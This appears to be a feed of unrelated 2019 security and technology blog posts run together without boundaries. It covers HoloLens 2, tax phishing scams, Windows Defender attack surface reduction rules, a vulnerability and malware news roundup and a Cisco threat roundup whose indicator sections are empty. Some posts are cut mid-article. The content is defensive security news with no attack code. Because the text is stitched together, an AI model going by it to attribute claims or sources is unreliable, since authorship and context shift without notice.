Time-to-value is accelerated by Microsoft mixed reality applications like Dynamics 365 Remote Assist, Dynamics 365 Layout and the new Dynamics 365 Guides applications. In addition to the in-box value, our ecosystem of mixed reality partners provides a broad range of offerings built on HoloLens that deliver value across a range of industries and use cases. This partner ecosystem is being supplemented by a new wave of mixed reality entrepreneurs who are realizing the potential of devices like HoloLens 2 and the Azure services that give them the spatial, speech and vision intelligence needed for mixed reality, plus battle-tested cloud services for storage, security and application insights.
Building on the unique capabilities of the original HoloLens, HoloLens 2 is the ultimate intelligent edge device. And when coupled with existing and new Azure services, HoloLens 2 becomes even more capable, right out of the box.
HoloLens 2 will be available this year at a price of $3,500. Bundles including Dynamics 365 Remote Assist start at $125/month. HoloLens 2 will be initially available in the United States, Japan, China, Germany, Canada, United Kingdom, Ireland, France, Australia and New Zealand. Customers can preorder HoloLens 2 starting today at https://www.microsoft.com/en-us/hololens/buy.
In addition to HoloLens 2, we were also excited to make the following announcements at MWC Barcelona.
Azure Kinect Developer Kit (DK)
The Azure Kinect DK is a developer kit that combines our industry-leading AI sensors in a single device. At its core is the time-of-flight depth sensor we developed for HoloLens 2, high-def RGB camera and a 7-microphone circular array that will enable development of advanced computer vision and speech solutions with Azure. It enables solutions that don’t just sense but understand the world — people, places, things around it. A good example of such a solution in the healthcare space is Ocuvera, which is using this technology to prevent patients from falling in hospitals. Every year in the U.S. alone, over 1 million hospital patients fall each year, and 11,000 of those falls are fatal. With Azure Kinect, the environmental precursors to a fall can be determined and a nurse notified to get to patients before they fall. Initially available in the U.S. and China, the Azure Kinect DK is available for preorder today at $399. Visit Azure.com/Kinect for more info.
Dynamics 365 Guides
When we announced Dynamics 365 Remote Assist and Dynamics 365 Layout on October 1, we talked about them as the “first” of our mixed reality applications for HoloLens.
Today, we are proud to announce our latest offering: Microsoft Dynamics 365 Guides.
Dynamics 365 Guides is a new mixed reality app that empowers employees to learn by doing. Guides enhances learning with step-by-step instructions that guide employees to the tools and parts they need and how to use them in real work situations. In addition to the experience of using Guides on HoloLens, a Guides PC app makes it easy to create interactive content, attach photos and videos, import 3D models and customize training to turn institutional knowledge into a repeatable learning tool.
This application will help minimize downtime and increase efficiency for mission-critical equipment and processes and becomes the third Dynamics 365 application that will work on both the previous generation of HoloLens and the new HoloLens 2.
Dynamics 365 Guides is available in preview starting today.
Azure Mixed Reality Services
Today we also announced two new Azure mixed reality services. These services are designed to help every developer and every business build cross-platform, contextual and enterprise-grade mixed reality applications.
Azure Spatial Anchors enables businesses and developers to create mixed reality apps that map, designate and recall precise points of interest that are accessible across HoloLens, iOS and Android devices. These precise points of interest enable a range of scenarios, from shared mixed reality experiences to wayfinding across connected places. We’re already seeing this service help our customers work and learn with greater speed and ease in manufacturing, architecture, medical education and more.
Azure Remote Rendering helps people experience 3D without compromise to fuel better, faster decisions. Today, to interact with high-quality 3D models on mobile devices and mixed reality headsets, you often need to “decimate,” or simplify, 3D models to run on target hardware. But in scenarios like design reviews and medical planning, every detail matters, and simplifying assets can result in a loss of important detail that is needed for key decisions. This service will render high-quality 3D content in the cloud and stream it to edge devices, all in real time, with every detail intact.
Azure Spatial Anchors is in public preview as of today. Azure Remote Rendering is now in private preview in advance of its public preview.
Microsoft HoloLens Customization Program
HoloLens is being used in a variety of challenging environments, from construction sites and operating rooms to the International Space Station. HoloLens has passed the basic impact tests from several protective eyewear standards used in North America and Europe. It has been tested and found to conform to the basic impact protection requirements of ANSI Z87.1, CSA Z94.3 and EN 166. With HoloLens 2 we’re introducing the Microsoft HoloLens Customization Program to enable customers and partners to customize HoloLens 2 to fit their environmental needs.
The first to take advantage of the HoloLens Customization Program is our long-standing HoloLens partner Trimble, which last year announced Trimble Connect for HoloLens along with a new hard hat solution that improves the utility of mixed reality for practical field applications. Today it announced the Trimble XR10 with Microsoft HoloLens 2, a new wearable hard hat device that enables workers in safety-controlled environments to access holographic information on the worksite.
Finally, as we closed things out, Alex Kipman articulated a set of principles around our open approach with the mixed reality ecosystem.
We believe that for an ecosystem to truly thrive there should be no barriers to innovation or customer choice.
To that end, Alex described how HoloLens embraces the principles of open stores, open browsers and open developer platforms.
To illustrate our dedication to these principles, we announced that our friends at Mozilla are bringing a prototype of the Firefox Reality browser to HoloLens 2, demonstrating our commitment to openness and the immersive web. Alex was also joined by Tim Sweeney, founder and CEO of Epic Games, who announced that Unreal Engine 4 support is coming to HoloLens.
In the coming months we will have more announcements and details to share. We look forward to continuing this journey with you all.
The post Microsoft at MWC Barcelona: Introducing Microsoft HoloLens 2 appeared first on The Official Microsoft Blog.
It was another travel week so another slightly delayed weekly update, but still plenty of stuff going on all the same. Along with a private Sydney workshop earlier on, I'm talking about some free upcoming NDC meetup events in Brisbane and Melbourne and I'd love to get a great turnout for. I've just ordered 10k more HIBP stickers to last me through upcoming events so they'll be coming with me.
In other news, there was old news appearing as new news about how hosed you are if your machine is compromised with the level of hosing extending to your password manager. This will inevitably be another one of these times where something gets blown out of proportion (and context) in some of the news headlines then we'll all go back to more sane discussions about assessing relative risks, likelihoods and impacts. There's also a very stead feed of breaches making their way into HIBP after appearing for sale on dark web marketplaces so I give a bit of an update on those as well.
All that and more this week in a slightly shorter form than usual, enjoy!
- Catch me in Brisbane next week at the NDC meetup (free, and very close to capacity already)
- Or catch me in Melbourne a couple of weeks later for the NDC meetup there (that event has just gone up so there's tickets left, but there's also strong interest)
- Order yourself some Have I Been Pwned stickers (and help me by using the referral code in that blog post so I can buy more to give away at events)
- Twilio is sponsoring my blog this week (they're talking about how easy it is to use Authy for 2FA instead of risky SMS)
Today I received an email inviting me to buy a Easy File Shredder product for a special price of $15 instead of the usual price of $50.
Securely deleting sensitive data is really important. But is buying a product really needed?
This type of thing has generally been needed because when you delete a file, you are essentially marking the file space as unallocated, and until the space is used for new files, recovery software can “undelete” it.
For this reason, if I were deleting a sensitive file at work, I might use a something like sdelete from Microsoft Sysinternals or if I’d neglected to delete it securely, I’d use something like ‘cipher /w:F’ to wipe these file rementants from the whitespace.
Now I hear what you’re saying. These command line tools are fine, but a normal user might be needing a GUI. CCleaner has a securedelete functionality, as wells as a drive whitespace cleaner that can be used.
But this isn’t even the worst part about this. Many, if not most computers are now using SSDs for performance. The Secure File Deleting device I’ve given are for traditional drives. With SSDs you cant securely delete a file by overwriting the original blocks. There are no file blocks. A product like this is of questionable benefit.
What you need to do instead is make sure that you have full disk encryption enabled. On Windows this is bitlocker for your main drive and bitlocker to go for your removable storage. Then if someone were trying to recover files that you’ve previously deleted, they would need to first successfully authenticate to the computer.
- Have a quiet word with the auditor/s about it, ideally before it gets written up and finalized in writing. Discuss the issue – talk it through, consider various perspectives. Negotiate a pragmatic mutually-acceptable resolution, or at least form a better view of the sticking points.
- Have a quiet word with your management and specialist colleagues about it, before the audit gets reported. Discuss the issue. Agree how you will respond and try to resolve this. Develop a cunning plan and gain their support to present a united front. Ideally, get management ready to demonstrate that they are definitely committing to fixing this e.g. with budget proposals, memos, project plans etc. to substantiate their commitment, and preferably firm timescales or agreed deadlines.
- Gather your own evidence to strengthen your case. For example:
- If you believe an issue is irrelevant to certification since there is no explicit requirement in 27001, identify the relevant guidance about the audit process from ISO/IEC 27007 plus the section of 27001 that does not state the requirement (!)
- If the audit finding is wrong, prove it wrong with credible counter-evidence, counter-examples etc. Quality of evidence does matter but quantity plays a part. Engage your extended team, management and the wider business in the hunt.
- If it’s a subjective matter, try to make it more objective e.g. by gathering and evaluating more evidence, more examples, more advice from other sources etc. ‘Stick to the facts’. Be explicit about stuff. Choose your words carefully.
- Ask us for second opinions and guidance e.g. on the ISO27k Forum and other social media, industry peers etc.
- Wing-it. Duck-and-dive. Battle it out. Cut-and-thrust. Wear down the auditor’s resolve and push for concessions, while making limited concessions yourself if you must. Negotiate using concessions and promises in one area to offset challenges and complaints in another. Agree on and work towards a mutually-acceptable outcome (such as, um, being certified!).
- Be up-front about it. Openly challenge the audit process, findings, analysis etc. Provide counter-evidence and arguments. Challenge the language/wording. Push the auditors to their limit. [NB This is a distinctly risky approach! Experienced auditors have earned their stripes and are well practiced at this, whereas it may be your first time. As a strategy, it could go horribly wrong, so what’s your fallback position? Do you feel lucky, punk?]
- Suck it up! Sometimes, the easiest, quickest, least stressful, least risky (in terms of being certified) and perhaps most business-like response is to accept it, do whatever you are being asked to do by the auditors and move on. Regardless of its validity for certification purposes, the audit point might be correct and of value to the business. It might actually be something worth doing … so swallow your pride and get it done. Try not to grumble or bear a grudge. Re-focus on other more important and pressing matters, such as celebrating your certification!
- Negotiate a truce. Challenge and discuss the finding and explore possible ways to address it. Get senior management to commit to whichever solution/s work best for the business and simultaneously persuade/convince the auditors (and/or their managers) of that.
- Push back informally by complaining to the certification body’s management and/or the body that accredited them. Be prepared to discuss the issue and substantiate your concerns with some evidence, more than just vague assertions and generalities.
- Push back hard. Review your contract with the certification body for anything useful to your case. Raise a formal complaint with the certification body through your senior management … which means briefing them and gaining their explicit support first. Good luck with that. You’ll need even stronger, more explicit evidence here. [NB This and the next bullet are viable options even after you have been certified … but generally, by then, nobody has the energy to pursue it and risk yet more grief.]
- Push back even harder. Raise a complaint with the accreditation body about the certification body’s incompetence through your senior management … which again means briefing them and gaining their explicit support first, and having the concrete evidence to make a case. Consider enlisting the help of your lawyers and compliance experts willing to get down to the brass tacks, and with the experience to build and present your case.
- Delay things. Let the dust settle. Review, reconsider, replan. Let your ISMS mature further, particularly in the areas that the auditors were critical of. Raise your game. Redouble your efforts. Use your metrics and processes fully.
- Consider engaging a different certification body (on the assumption that they won’t raise the same concerns … nor any others: they might be even harder to deal with!).
- Consider engaging different advisors, consultants and specialists. Review your extended ISMS team. Perhaps push for more training, to enhance the team’s competence in the problem areas. Perhaps broaden ‘the team’ to take on-board other specialists from across the business. Raise awareness.
- Walk away from the whole mess. Forget about certification. Go back to your cave to lick your wounds. Perhaps offer your resignation, accepting personal accountability for your part in the situation. Or fire someone else!
For cybercriminals tax time is the most wonderful time of the year. They are in the shadows giddy, eager, and methodically setting a variety of digital traps knowing that enough taxpayers take the bait to render their efforts worthwhile.
Indeed, with the frenzy of online tax filings, personal information (and money) moving through mailboxes, and hardworking people eagerly awaiting tax refunds, crooks are perfectly positioned for big returns this year.
So let’s be wiser and let’s be ready.
Last year, the IRS noted a 60 percent spike in bogus email schemes seeking to steal money or tax information. This year its a surge in phishing scams, says the IRS, that should have taxpayers on alert.
“The holidays and tax season present great opportunities for scam artists to try stealing valuable information through fake emails,” said IRS Commissioner Chuck Rettig. “Watch your inbox for these sophisticated schemes that try to fool you into thinking they’re from the IRS or our partners in the tax community. Taking a few simple steps can protect yourself during the holiday season and at tax time.”
Scams to Look For
According to the IRS, phishing emails are circulating with subjects such as “IRS Important Notice,” “IRS Taxpayer Notice” and other iterations of that message. The fraudulent emails may demand payment with the threat of seizing the recipient’s tax refund or even jail time.
Attacks may also use email or malicious links to solicit tax or financial information by posing as a trustworthy organization or even a personal friend or business associate of the recipient.
While some emails may have obvious spelling errors or grammar mistakes, some scammers have gone to great lengths to piece together a victim’s personal information to gain their trust. These emails look legitimate, have an authentic tone, and are crafted to get even skeptics to compromise personal data using malicious web links.
Scams include emails with hyperlinks that take users to a fake site or PDF attachments that may download malware or viruses designed to grab sensitive information off your devices. With the right data in hand such as a social security number, crooks can file fake returns and claim your tax return, open credit cards, or run up medical bills.
Other tax scams include threatening phone calls from bogus IRS agents demanding immediate payment of past due tax bills and robocalls that leave urgent callback messages designed to scare victims into immediate payment.
Remember, the IRS will NOT:
- Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
- Call or email you to verify your identity by asking for personal and financial information.
- Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
- Require you to use a specific payment method for your taxes, such as a prepaid debit card.
- Ask for credit or debit card numbers over the phone or
- Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.
How to Protect Yourself
Be hyper-aware. Never open a link or attachment from an unknown or suspicious source. In fact, approach all emails with caution even those from people you know. Scams are getting more sophisticated. According to the IRS, thieves can compromise a friend’s email address, or they may be spoofing the address with a slight change in the email text that is hard to recognize.
Reduce your digital footprint. Now is a great time to go through your social accounts and online profiles, posts, and photos and boost your family’s privacy. Edit out any personal information such as your alma mater, your address, birthdate, pet names, children’s names, or mother’s maiden name. Consider making your social profiles private and filtering your friends’ list to actual people you know.
Have a strong password strategy. Cybercrooks count on their victims using the same password for multiple accounts. Lock them out by using unique passwords for separate accounts. Also, consider using two-factor authentification that requires a security code (sent to your phone) to access your account.
Install security software. Phishing emails carry malware and viruses designed to infect your devices and grab your family’s sensitive data or even seize your computer via ransomware. Crooks aren’t messing around so neither should you. Meet fire with fire by investing in comprehensive security software to protect your devices.
If you are the victim of tax fraud or identity theft, take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS, forward them to email@example.com (then delete the emails).
The post Don’t Take the Bait! How to Steer Clear of Tax Time Scams appeared first on McAfee Blogs.
A passenger on a Singapore Airlines flight this week noticed a small, circular indentation below the image playing on the seatback in-flight entertainment system in front of him. Could that be, he wondered, a camera?
The passenger did the only logical thing: He tweeted out a photo and asked the Twitterverse for opinions, setting off a chorus of complainers on Twitter.
Singapore Airlines also responded to the tweets, saying that the camera was not used by the airline to capture pictures or video. It then told media outlets in a statement that the embedded cameras “have been intended by the manufacturers for future developments. These cameras are permanently disabled on our aircraft and cannot be activated on board. We have no plans to enable or develop any features using the cameras.”
Notice anything new?
At ThreatConnect, our philosophy since our founding has been that we would incorporate intelligence in all aspects of security operations including orchestration and workflow, as functionality within our Platform. We believe (and always have) that an intelligence-led defense benefits organizations and allows better predictive and proactive strategic decision-making.
That said, like most, we are a work in progress. This year, we felt it was time to update our look, mature, and expand. So we decided a redefine was in order. We have streamlined our Platform, our logo, and our brand.
We use the term: redefine; not refresh or even rebrand. And maybe we’re being a bit semantical, but like I said, this is not about something new. This is about a recognition of the Platform in its next iteration. If you remember, in 2017 – two years ago – we launched TC Complete, our advanced intelligence-driven security operations and analytics platform. In TC Complete we introduced automation and orchestration using Playbooks. Then we brought out ThreatConnect’s CAL (Collective Analytics Layer), then the ROI calculator, numerous apps and integrations, and well, you get where I am going. We have long since expanded from serving largely the TI team to being used by security operations, incident response, and security leadership.
As always, we will continuously launch additional features and functionality that further our vision to be THE platform for security and bring you expanded value. Expect to see us take more strides in doubling down on supporting creation of good intel, making it operational across the team, and helping leaders manage the business of security. This brand redefine reflects all of that!
Without going into a lot of detail, the brand redefine was a complicated and overwhelming process as one might expect. And, well, it involved a lot of internal rounds of approvals (read: personal opinions), a lot of imbibing (not sure I was supposed to admit that), and much discussion. Iterations. Iterations. Iterations.
Ok, so maybe that was a lot of detail. Either way, you get it. It was arduous. But we prevailed.
The result is a new mark and look that we feel conveys a theme of motion and convergence. The new logo shows motion through its curve, and you’ll also see motion in the flow of the background illustrations on the website. Take a look. Movement is conveyed through the illustration and color gradient as well; a sense of momentum. We see this as a call to action — bringing an end to the old, inefficient way of doing things and taking a major stand for change. It is a rebellion against the status quo and yet, about the formation of a community. We hope it speaks to our Platform – dynamic and powerful.
In short, we went from this:
We see our new mark and redefined brand as the natural evolution of our current brand: bright, optimistic, approachable. We hope you do, too.
The post A Change Will Do You (and Us) Good appeared first on ThreatConnect | Intelligence-Driven Security Operations.
The keystone to good security hygiene is limiting your attack surface. Attack surface reduction is a technique to remove or constrain exploitable behaviors in your systems. In this blog, we discuss the two attack surface reduction rules introduced in the most recent release of Windows and cover suggested deployment methods and best practices.
Software applications may use known, insecure methods, or methods later identified as useful for malware exploits. For example, macros are an old and powerful tool for task automation. However, macros can spawn child processes, invoke the Windows API, and perform other tasks which render them exploitable by malware.
Windows Defender Advanced Threat Protection (Windows Defender ATP) enables you to take advantage of attack surface reduction rules that allow you to control exploitable threat vectors in a simple and customizable manner. In previous releases of Windows we launched rules that let customers disallow remote process creation through WMI or PSExec and block Office applications from creating executable content. Other rules include the ability to disable scripts from creating executable content or blocking file executions unless age and prevalence criteria are met.
The latest attack surface reduction rules in Windows Defender ATP in latest re based on system and application vulnerabilities uncovered by Microsoft and other security companies. Below we describe that these rules do. More importantly, we outline recommendations for deploying these rules in enterprise environments.
Block Office communication apps from creating child processes
The Block Office Communication Applications from Creating Child Processes rule protects against attacks that attempt to abuse the Outlook email client. For example, in late 2017 Sensepost demonstrated the DDEAUTO attack, which was later discovered to be applicable to Outlook as well. In this case, this attack surface reduction rule disables the creation of another process from Outlook this means that DDE still works and data can be exchanged by two running applications, but new processes cannot be created. It is important to note that DDE, and DDEAUTO, are legacy, inter-process communication features available since 1987. Many line-of-business applications rely on this capability. If, for example, DDE is not used in your organization, or if you want to restrict the capability of DDE to already running processes, this can be configured by using the AllowDDE registry key for Office.
While rare, if your organizations applications utilize creating child processes from within Office communication applications, this attack surface reduction rule provides protection by allowing legitimate processes with exclusions. By limiting child processes that can be launched by Outlook to only processes with well-defined functionality, this attack surface reduction rule confines a potential exploit or a social engineering threat from further infecting or compromising the system.
Block Adobe Reader from creating child processes
The second rule weve introduced, Block Adobe Reader from Creating Child Processes limits the ability of a threat in a malicious PDF file from launching additional payloads, either embedded in a PDF file or downloaded by a threat, irrespective of how the malicious code in the PDF gained code execution either by social engineering or by exploiting an unknown vulnerability.
While there may be legitimate business reasons for a business PDF file to create a child process through scripting, this is a behavior that should be discouraged as it is prone to misuse. Our data indicates few legitimate applications utilize this technique. The Block Adobe Reader from Creating Child Processes rule disables child process creation in PDF content except for those files excluded by the IT administrator.
Recommendations on exclusions and deployment
Attack surface reduction rules close frequently used and exploitable behaviors in the operating system and in apps. However, legitimate line-of-business and commercial applications have been written utilizing these same behaviors. To enable non-malicious applications critical to your business, exclusions can be used if they are flagged as violating an attack surface reduction rule. Core Microsoft components, such as operating system files or Office applications, reside in a global exclusion list maintained as part of Defender. These do not need exclusions.
Exclusions, when applied, are honored by other Windows Defender ATP exploit mitigation features including Controlled folder access and Network protection, in addition to attack surface reduction rules. This simplifies exclusion management and standardizes application behavior.
Attack surface reduction rules have three settings: off, audit, and block. Our recommended practice to deploy attack surface reduction rules is to first implement the rule in audit mode.
Audit mode will identify exploitable behavior use but will not block the behavior. With audit, if you have a line of business application utilizing a behavior that is exploitable, the invoking application can be identified, and an exclusion added.
Rules can be enabled in audit with Group Policy, SCCM, or PowerShell. You can review the audited events with Advanced hunting and Alert investigation in Windows Defender Security Center; by creating a custom view in Windows Event Viewer; or using automated log aggregation tools like SIEM.
When audit telemetry reveals that line-of-business applications are no longer being impacted by the attack surface reduction rule, the attack surface reduction rule setting can be switched to block. This will protect against malware exploitation of the behavior.
For larger enterprises, Microsoft recommends deploying attack surface reduction rules in rings. Rings are groups of machines radiating outward like non-overlapping tree rings. When the inner ring is successfully deployed with required exclusions, the next ring can be deployed. One of the ways you can create a ring process is by creating specific groups of users or devices in Intune or with a Group Policy management tool.
Monitor attack surface reduction event telemetry
Once a rule is deployed in block mode, it is important to monitor corresponding event telemetry. This data contains important information. For example, an application update may now require an exclusion or multiple alerts from a user clicking on email executable attachments can indicate additional training is required. Attack surface reduction rule events may be from a single, random malware breach, or your organization may be the object of a new, persistent attack attempting to utilize a vector covered by attack surface reduction rules suddenly producing a large increase in related attack surface reduction-rule block events.
Where to get more information and support
If you havent deployed any attack surface reduction rules, take a look at our documentation and discover how you can better protect your enterprise.
Minimizing your attack surface can yield large paybacks in decreased threat vulnerability and in allowing the security operations team to focus on other threat vectors.
As with all security features, enable attack surface reduction rules in a methodical, controlled manner that allows legitimate business applications to be excluded from analysis.
Peter Thayer and Iaan DSouza-Wiltshire (@IaanMSFT)
Windows Defender ATP
Talk to us
The post Recommendations for deploying the latest Attack surface reduction rules for maximum impact appeared first on Microsoft Secure.
Pangea Communication's Internet FAX Analog Telephone Adapter (ATA) can be abused by an authentication bypass to cause the device to reboot and create a continual denial-of-service condition. Internet FAX ATA Version 3.1.8 and prior are affected. Further information is available from an ICS-CERT advisory.
Cisco issued a batch of security advisories to address various vulnerabilities across its products lines. Among the most critical issues is a vulnerability in the Identity Services Engine (ISE) integration feature of Cisco Prime Infrastructure (PI) that could allow an unauthenticated, remote attacker to perform a man-in-the-middle attack against the Secure Sockets Layer tunnel established between ISE and PI. Customers should immediately apply any updates to mitigate risks.
Due to a highly critical remote code execution vulnerability, upgrades for Drupal have been released. This issue occurs when some field types do not properly sanitize data from non-form sources.
According to an advisory posted by the ICS-CERT, gpsd and microjson, which are frameworks from the gpsd Open Source Project, contain a stack-based overflow vulnerability. As reported on the gpsd website, gpsd can be found in many mobile embedded systems such as Android phones, drones, robot submarines, driverless cars, manned aircraft, marine navigation systems, and military vehicles. Mitigation techniques are discussed in the advisory.
Multiple potential security vulnerabilities in Intel Data Center Manager SDK may allow escalation of privilege, denial of service, or information disclosure. The vendor released software updates to mitigate these potential vulnerabilities.
A privilege escalation vulnerability in the LG Device Manager application affects the vendor's laptops. A security researcher found the vulnerability which can allow an attacker to exploit the Device Manager app through its low-level hardware access kernel-mode driver and elevate privileges. LG released a patch on February 13.
Microsoft announced that it will only sign Windows updates using the Secure Hash Algorithm 2 (SHA-2) and has begun the migration process from Secure Hash Algorithm 1 (SHA-1). Any customer running legacy Windows versions will need to have SHA-2 code-signing support installed by July 16. Further details are available in a vendor-issued post.
Oracle has uncovered a mobile ad fraud operation - "DrainerBot" - that is distributed through "millions of downloads of infected consumer apps." Infected apps, Oracle noted, can consume "more than 10GB of data per month downloading hidden and unseen video ads." The DrainerBot code is believed to have been distributed via an infected SDK (software development kit) that is integrated into consumer Android apps. Further information and remediation options are available via an Oracle press release.
Rockwell Automation's Allen-Bradley PowerMonitor 1000 is affected by cross-site scripting and authentication bypass vulnerabilities. All versions of PowerMonitor 1000, an energy metering device used in industrial control applications, are vulnerable. The ICS-CERT noted that the vendor is working on mitigations. Proof-of-concept exploits exist for both vulnerabilities.
Popular password managers contain a critical flaw that could enable adversaries to steal passwords. This vulnerability, which was discovered by Independent Security Evaluators, examined 1Password, Dashlane, KeePass, and LastPass and determined that each product did not employ proper secrets sanitization, which makes it possible for an attacker to identify clear text passwords from the products' memory. The problem is that each password manager stored the master password or individual credentials on insecure memory on the computer. An attacker could gain access to the system and steal the passwords.
An improper input validation vulnerability in Horner Automation's Cscape could crash the device being accessed, which may allow the attacker to read confidential information and remotely execute arbitrary code. Cscape is a control system application programming software and the fixed version, 9.90, is available for download. Further information can be found in an advisory posted by the ICS-CERT.
Delta Electronics' Industrial Automation CNCSoft can be exploited by an out-of-bounds read vulnerability that could lead to a buffer overflow condition that may allow information disclosure or crash the application. An ICS-CERT advisory suggests updating to the latest version of CNCSoft.
A hacker could capsize a ship by creating a cyber attack, researchers at Pen Test Partners have warned. Ship control systems, which include IP-to-serial converters, GPS receivers, or the Voyage Data Recorder, can all be easily hacked and many continue to run outdated systems like Windows XP or Windows NT. The researchers also found that many Moxa device servers that are used aboard ships are vulnerable to a firmware downgrade attack that can allow them to be compromised. Researcher Ken Munro said, "If one was suitably motivated, perhaps by a nation state or a crime syndicate, one could bring about the sinking of a ship."
VMware posted an update to resolve a mishandled file descriptor vulnerability in runC container runtime. Successful exploitation of this issue may allow a malicious container to overwrite the contents of a host's runC binary and execute arbitrary code.
A malware variant is using two hacking tools to exploit a patched Windows SMB Server vulnerability and mine for Monero. The cryptocurrency miner is employing the MIMIKATZ and RADMIN tools to exfiltrate data and steal credentials. Trend Micro's research team has posted details about its findings on this malware.
Researchers at Deep Instinct have identified a phishing attack that uses malicious PDF documents to spread the Separ malware and swipe user data. The attack has affected hundreds of companies, located mainly in South East Asia and the Middle East, with some targets located in North America. Separ uses a combination of short script or batch files, and legitimate executables to carry out all of its malicious dealings.
McAfee, in conjunction with security firm Coveware, has released findings on the dynamics of the Ryuk ransomware. Coveware determined that Ryuk's ransom amounts averaged more than 10 times the average ransom and that some of Ryuk's ransoms were negotiable, although not all variants were. These negotiations generated an average ransom payment of $71,000 USD, a 60% discount from an average opening ask of $145,000.
Rietspoof, which was detected by Avast, is a multi-stage malware family that combines various file formats, to deliver a more versatile malware. The analysis shows that the first stage is delivered through instant messaging clients, such as Skype or Live Messenger. It then delivers a highly obfuscated Visual Basic Script with a hard-coded and encrypted second stage, a CAB file. The CAB file is expanded into an executable that is digitally signed with a valid signature, mostly using Comodo. The .exe installs a downloader in the fourth stage. Avast's researchers wrote, "What's interesting to note, is that the third stage uses a simple TCP protocol to communicate with its C&C (command and control server), whose IP address is hardcoded in the binary. The protocol is encrypted by AES in CBC mode. In one version we observed the key being derived from the initial handshake, and in a second version it was derived from a hard-coded string. In version two, the protocol not only supports its own protocol running over TCP, but it also tries to leverage HTTP/HTTPS requests."
Kaspersky Lab researchers detected a surge in activity by the RTM banking Trojan with more than 130,000 users attacked in 2018, a significant increase from 2,376 attacked users in 2017. As of mid-February, 30,000 users have been attacked in 2019. The Trojan is distributed through email phishing and once installed on the victim's computer, it gives the attackers full control over the infected system. The RTM Trojan then substitutes account details while an infected victim attempts to make a payment or transfer funds. It can also be used by cybercriminals to manually steal money using remote access tools.
Symantec discovered several potentially unwanted applications on the Microsoft Store that used the victim's CPU power to mine cryptocurrency. The apps came from three developers - DigiDream, 1clean, and Findoo - and all showed the same risky behavior. Once contacted, Microsoft removed the apps from the store.
When Imperva announced in 2018 it would acquire the application security solution provider Prevoty, a company I co-founded with Julien Bellanger, I knew it would be a win-win for our industry. Prevoty’s flagship product, Autonomous Application Protection, is the most mature, market-tested runtime application self-protection (RASP) solution (as proof, Prevoty was just named a Silver Winner in the Cybersecurity Excellence Awards). Together, Imperva and Prevoty are creating a consolidated, comprehensive platform for application and data security.
More importantly, this acquisition is a big win for our customers. The combination of Imperva and Autonomous Application Protection extends customers’ visibility into how applications behave and how users interact with sensitive information. With this expanded view across their business assets, customers will have deeper insights to understand and mitigate security risk at the edge, application, and database.
In parallel with product integrations, our teams of security innovators are coming together. I am delighted to join the Imperva team as CTO and to lead a highly accomplished group to radically transform the way our industry thinks about application and data security. In the coming horizon, we will boost data visibility throughout the stack, translate billions of data points into actionable insights, and intelligently automate responses that protect businesses. In fact, we just released two new features that deliver on those goals: Network Activity Protection and Weak Cryptography Protection. Learn more about these at Imperva.com and also in my interview with eWeek.
Network Activity Protection provides organizations with the ability to monitor and prevent unauthorized outbound network communications originating from within their applications, APIs, and microservices — a blind spot for organizations that are undergoing a digital transformation. Organizations now have a clear view into the various endpoints with which their applications communicate.
The new Weak Cryptography Protection feature offers the ability to monitor and protect against the use of specific weak hashing algorithms (including SHA-1, MD5) and cryptographic ciphers (including AES, 3DES/DES, RC4). Applications that leverage Autonomous Application Protection can now monitor and force compliant cryptographic practices.
Imperva is leading the world’s fight to keep data and applications safe from cyber criminals. Organizations that deploy Imperva will not have to choose between innovation and protecting their customers. The future of application and data security will be smarter,simpler, and we are leading the way there.
Imperva will be at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and learn about the New Imperva from me (I’ll be there Tuesday-Thursday) and other executives! We’ve revamped our suite of security solutions under a new license called FlexProtect that makes it simpler for organizations to deploy our security products and services to deliver the agility they need as they digitally transform their businesses.
Start your day or enjoy an afternoon pick-me-up by grabbing a coffee in our booth Tuesday through Thursday 10-2 pm, while:
- See a demo of our latest products in the areas of cloud app and data security and data risk analytics
- Learn more about how our suite of security solutions works in AWS environments
Imperva will also be at the AWS booth (1227 in the South Expo hall). There, you can:
- Hear how one of our cloud customers, an U.S.-based non-profit with nearly 40 million members, uses AAP to detect and mitigate potential application attacks, Tuesday, March 5th from 3:30 – 4:00 pm in the AWS booth
- See a demo of how our solutions work in cloud environments, Tuesday, March 5th 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm
Finally – we will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” at RSA. It will be first broadcast at 9:30 am on March 6th and feature George McGregor, vice-president of product marketing at Imperva, in a Q&A discussion with executives from several other vendors as they discuss the possibility of a cyber battle between AI systems, which experts predict might be on the horizon in the next three to five years. Register and watch for free!
The post Imperva Makes Major Expansion in Application Security appeared first on Blog.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
For each threat described below, this blog post only lists 25 of the associated file hashes. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Icloader is a generic malware that largely behaves like adware. The samples are packed and have evasive checks to hinder the analysis and conceal the real activities. This family can inject code in the address space of other processes and upload files to a remote server.
Bublik is a downloader that targets Windows hosts. Although it's primarily used as malware to distribute various banking trojans, it's also capable of extracting and exfiltrating sensitive information from the host.
Razy is oftentimes a generic detection name for a Windows trojan. They collect sensitive information from the infected host, format and encrypt the data, and send it to a C2 server. In this case, some of the samples in certain identified clusters can be attributed as Cerber samples, although the detection remains the same.
Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
Indicators of Compromise
Screenshots of DetectionAMP
Indicators of Compromise
Screenshots of DetectionAMP
Indicators of Compromise
Screenshots of DetectionAMP
Indicators of Compromise
Screenshots of DetectionAMP
Indicators of Compromise
